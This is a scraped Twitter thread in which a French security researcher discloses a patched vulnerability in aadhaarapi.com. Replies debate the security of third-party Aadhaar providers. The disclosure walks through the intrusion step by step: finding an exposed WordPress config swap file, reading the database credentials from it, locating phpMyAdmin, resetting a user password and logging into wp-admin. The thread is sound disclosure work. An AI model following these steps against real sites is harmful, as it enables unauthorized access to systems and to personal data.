Skip to content
By using Twitter’s services you agree to our Cookies Use. We and our partners operate globally and use cookies, including for analytics, personalisation, and ads.
  • Home Home Home, current page.
  • Moments Moments Moments, current page.

Saved searches

  • Remove
  • In this conversation
    Verified accountProtected Tweets @
Suggested users
  • Verified accountProtected Tweets @
  • Verified accountProtected Tweets @
  • Language: English
    • Bahasa Indonesia
    • Bahasa Melayu
    • Català
    • Čeština
    • Dansk
    • Deutsch
    • English UK
    • Español
    • Filipino
    • Français
    • Hrvatski
    • Italiano
    • Magyar
    • Nederlands
    • Norsk
    • Polski
    • Português
    • Română
    • Slovenčina
    • Suomi
    • Svenska
    • Tiếng Việt
    • Türkçe
    • Ελληνικά
    • Български език
    • Русский
    • Српски
    • Українська мова
    • עִבְרִית
    • العربية
    • فارسی
    • मराठी
    • हिन्दी
    • বাংলা
    • ગુજરાતી
    • தமிழ்
    • ಕನ್ನಡ
    • ภาษาไทย
    • 한국어
    • 日本語
    • 简体中文
    • 繁體中文
  • Have an account? Log in
    Have an account?
    · Forgot password?

    New to Twitter?
    Sign up
fs0c131y's profile
Elliot Alderson
Elliot Alderson
Elliot Alderson
@fs0c131y

Tweets

Elliot Alderson

@fs0c131y

French security researcher. Worst nightmare of Oneplus, Wiko, UIDAI, Kimbho and others. Not completely schizophrenic. Not related to USANetwork. DMs open.

Joined June 2015

Tweets

  • © 2018 Twitter
  • About
  • Help Center
  • Terms
  • Privacy policy
  • Cookies
  • Ads info
Dismiss
Previous
Next

Go to a person's profile

Saved searches

  • Remove
  • In this conversation
    Verified accountProtected Tweets @
Suggested users
  • Verified accountProtected Tweets @
  • Verified accountProtected Tweets @

Promote this Tweet

Block

  • Tweet with a location

    You can add location information to your Tweets, such as your city or precise location, from the web and via third-party applications. You always have the option to delete your Tweet location history. Learn more

    Your lists

    Create a new list


    Under 100 characters, optional

    Privacy

    Copy link to Tweet

    Embed this Tweet

    Embed this Video

    Add this Tweet to your website by copying the code below. Learn more

    Add this video to your website by copying the code below. Learn more

    Hmm, there was a problem reaching the server.

    By embedding Twitter content in your website or app, you are agreeing to the Twitter Developer Agreement and Developer Policy.

    Preview

    Why you're seeing this ad

    Log in to Twitter

    · Forgot password?
    Don't have an account? Sign up »

    Sign up for Twitter

    Not on Twitter? Sign up, tune into the things you care about, and get updates as they happen.

    Sign up
    Have an account? Log in »

    Two-way (sending and receiving) short codes:

    Country Code For customers of
    United States 40404 (any)
    Canada 21212 (any)
    United Kingdom 86444 Vodafone, Orange, 3, O2
    Brazil 40404 Nextel, TIM
    Haiti 40404 Digicel, Voila
    Ireland 51210 Vodafone, O2
    India 53000 Bharti Airtel, Videocon, Reliance
    Indonesia 89887 AXIS, 3, Telkomsel, Indosat, XL Axiata
    Italy 4880804 Wind
    3424486444 Vodafone
    » See SMS short codes for other countries

    Confirmation

     

    Welcome home!

    This timeline is where you’ll spend most of your time, getting instant updates about what matters to you.

    Tweets not working for you?

    Hover over the profile pic and click the Following button to unfollow any account.

    Say a lot with a little

    When you see a Tweet you love, tap the heart — it lets the person who wrote it know you shared the love.

    Spread the word

    The fastest way to share someone else’s Tweet with your followers is with a Retweet. Tap the icon to send it instantly.

    Join the conversation

    Add your thoughts about any Tweet with a Reply. Find a topic you’re passionate about, and jump right in.

    Learn the latest

    Get instant insight into what people are talking about now.

    Get more of what you love

    Follow more accounts to get instant updates about topics you care about.

    Find what's happening

    See the latest conversations about any topic instantly.

    Never miss a Moment

    Catch up instantly on the best stories happening as they unfold.

    Elliot Alderson‏ @fs0c131y Jan 19

    Elliot Alderson Retweeted Elliot Alderson

    As the issue is now fixed, let disclose the details of the @aadhaarapi vulnerability I found 3 days ago. #wordpressForDummies #Aadhaar #AadhaarFailhttps://twitter.com/fs0c131y/status/953315051389284352 …

    Elliot Alderson added,

    Elliot Alderson @fs0c131y
    .@aadhaarapi can we discuss in private? You will probably be interested in what I have to say pic.twitter.com/nprweIjepW
    12:23 AM - 19 Jan 2018
    • 242 Retweets
    • 233 Likes
    • ####Pandey amith erupula Chinmay Kunkikar ₵Ɏ฿ɆⱤ ₱Ʉ₦₭ Anurag Rastogi Ranjeet Mewada Naveen Nagar Sriram Sharma 𝔼𝕧𝕚𝕝 ℙ𝕒𝕪𝕝𝕠𝕒𝕕
    17 replies 242 retweets 233 likes
      1. New conversation
      2. Elliot Alderson‏ @fs0c131y Jan 19

        After a quick @_WPScan_ scan you was able to see this line: "A wp-config.php backup file has been found in: 'https://aadhaarapi.com/.wp-config.php.swp …'"pic.twitter.com/BHnDR0jzDE

        4 replies 49 retweets 66 likes
        Show this thread
      3. Elliot Alderson‏ @fs0c131y Jan 19

        After the download of this file, you could open it like this: vim -R .wp-config.php.swp and obtain the database user and password.pic.twitter.com/qTdweo5NJP

        3 replies 39 retweets 44 likes
        Show this thread
      4. Elliot Alderson‏ @fs0c131y Jan 19

        Next step was to find the phpmyadmin panel. Testing the port 2083 or /phpmyadmin is always a good idea.pic.twitter.com/ngB5eRkUWc

        1 reply 25 retweets 33 likes
        Show this thread
      5. Elliot Alderson‏ @fs0c131y Jan 19

        After login, open the wp-user table and change the password of an existent user. Go to /wp-admin and enter the username with the new password, you are in!

        2 replies 35 retweets 48 likes
        Show this thread
      6. Elliot Alderson‏ @fs0c131y Jan 19

        Issue found: 16 Jan 1st contact with @aadhaarapi: 17 Jan Issue fixed: 17 Jan

        2 replies 27 retweets 46 likes
        Show this thread
      7. Elliot Alderson‏ @fs0c131y Jan 19

        .@aadhaarapi after had been caught with an issue like this, can I suggest to, at least, update your #wordpress plugins 🤦‍♂️?pic.twitter.com/0tzCv7XcPN

        5 replies 58 retweets 122 likes
        Show this thread
      8. End of conversation
      1. New conversation
      2. Srivatsan Iyer‏ @supersaiyan_9 Jan 19
        Replying to @fs0c131y @aadhaarapi

        Hey @aadharapi, Can you please tell us how the swap file got there? Do you not have a proper deployment process? Or is there no review of what gets committed and pushed? Or do your devs write code on the production machine (scary!)?

        1 reply 8 retweets 20 likes
      3. Suresh R‏ @iamabofh Jan 19
        Replying to @supersaiyan_9 @fs0c131y @aadhaarapi

        Guys at least learn to use puppet if you want to make us poor Indians into puppets at the end of the aadhaar chain. You're doing stupid things I've seen developers fired for, one after the other.

        3 replies 11 retweets 14 likes
      4. AazaadPanchhi‏ @gabbi612 Jan 19
        Replying to @iamabofh @supersaiyan_9 and

        Sir I really dont understand coding at all but you are right.If this had been with a private company the people behind this would have been fired by now.

        3 replies 0 retweets 2 likes
      5. aadipa‏ @aadipa Jan 19
        Replying to @gabbi612 @iamabofh and

        It is a private company, providing paid services on top of data they purchase from UIDAI. It's not Aadhaar itself.

        1 reply 0 retweets 2 likes
      6. Suresh R‏ @iamabofh Jan 19
        Replying to @aadipa @gabbi612 and

        A special sort of private company given the amount of access they have. A security auditor would have nightmares with this entire mess.

        1 reply 1 retweet 4 likes
      7. aadipa‏ @aadipa Jan 19
        Replying to @iamabofh @gabbi612 and

        I did a little Google and found that AadharAPI are just Sub-AUA most probably getting their data from @KhoslaLabs which is primary AUA and responsible for security of data. Here is total list of AUA maintained by UIDAI. https://uidai.gov.in/images/list_of_live_aua.pdf …

        1 reply 1 retweet 4 likes
      8. Suresh R‏ @iamabofh Jan 19
        Replying to @aadipa @gabbi612 and

        Ah, guess where the buck finally stops for security regardless sub sub sub aua type outsourcing?

        2 replies 1 retweet 1 like
      9. aadipa‏ @aadipa Jan 19
        Replying to @iamabofh @gabbi612 and

        It's not outsourcing.. It's auth service access. As I already said UIDAI need to extend their net. But at same time, you won't blame ICICI or Visa if someone hacks Paytm or PayU stored card database.

        2 replies 0 retweets 0 likes
      10. 4 more replies
      1. New conversation
      2. aadipa‏ @aadipa Jan 19
        Replying to @fs0c131y @aadhaarapi

        @UIDAI can you look into this? You need to extend your security checks to all 3rd party like these and avoid such potential vulnerabilities.

        2 replies 6 retweets 8 likes
      3. Vidyut‏ @Vidyut Jan 19
        Replying to @aadipa @nixxin and

        If their front facing sites are this carelessly coded, is it even safe to integrate the api with production sites?

        1 reply 1 retweet 6 likes
      4. aadipa‏ @aadipa Jan 19
        Replying to @Vidyut @nixxin and

        Exactly.. It's open market. Find some secure ASA if AadharAPI feels insecure. Only thing is, UIDAI/Aadhaar and AadharAPI are two different entities. Don't go with similar names.

        0 replies 0 retweets 1 like
      5. End of conversation
      1. Honkey Dankey‏ @honkey_dankey Jan 19
        Replying to @fs0c131y @aadhaarapi

        ANDDDD... ..JUST LIKE THAT they have the "worlds most largest private database?" FFS

        0 replies 3 retweets 15 likes
        Thanks. Twitter will use this to make your timeline better. Undo
        Undo
      1. Dinesh Shetty‏ @Din3zh Jan 19
        Replying to @fs0c131y @aadhaarapi

        @rssharma3 @UIDAI - Am assuming you still want to stick to your age old dialogue of 'There has never been an Aadhar breach , and anyone saying otherwise is a lier'?

        0 replies 4 retweets 7 likes
        Thanks. Twitter will use this to make your timeline better. Undo
        Undo
      1. Ravi A‏ @ravinininin Jan 19
        Replying to @fs0c131y @aadhaarapi

        These same jokers (Quagga Tech) were responsible for API key leak that resulted in fakes getting into the system. https://medium.com/karana/insecure-app-making-abd8548c3092 …pic.twitter.com/x3qitug6sS

        0 replies 3 retweets 2 likes
        Thanks. Twitter will use this to make your timeline better. Undo
        Undo

    Loading seems to be taking a while.

    Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

      Promoted Tweet

      false

      • © 2018 Twitter
      • About
      • Help Center
      • Terms
      • Privacy policy
      • Cookies
      • Ads info